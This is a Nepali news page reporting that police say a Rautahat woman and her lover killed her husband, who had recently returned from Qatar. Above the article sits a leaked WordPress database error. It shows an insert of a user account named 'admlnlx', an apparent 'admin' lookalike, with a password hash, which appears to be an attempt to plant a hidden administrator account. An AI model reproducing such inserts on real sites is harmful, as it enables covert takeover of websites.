WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0MNuhQSDGdUQKusunGtB4ma2f9ib80', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 06:50:53', '', 'admlnlx', 'admlnlx')
रौतहट, पुस २८–
रौतहट करुनियामा एक साताअघि भएको युवकको हत्यामा उनकै श्रीमती संलग्न भएको खुलेको छ । अभिनन्दन साहको हत्या प्रेममा बाधा भएपछि उनै श्रीमती सकुन्तलादेवीले गरेको खुलासा भएको प्रहरीले जनाएको आजको नयाँ पत्रिका दैनिकमा समाचार छ ।
कतारमा रोजगारी गरेर एक महिनाअघि मात्रै घर फर्किएका २३ वार्षका अभिनन्दनको पुस २१ गते घाँटी रेटेर हत्या भएको थियो ।
साह कतार गएका बेला सकुन्तलाको पप्पु भनिने मनिषकुमार सुमनबीच प्रेम सम्बन्ध भएको बुझिएको प्रहरीले बताएको छ । उनीहरुबीच दुई वर्षदेखि प्रेम सम्बन्ध भएको बुझिएको छ ।
साहको टाउकोमा फलामको रड प्रहार गरी लडाएर चक्कुले घाँटी रेटी हत्या भएको प्रहरीले जनाएको छ ।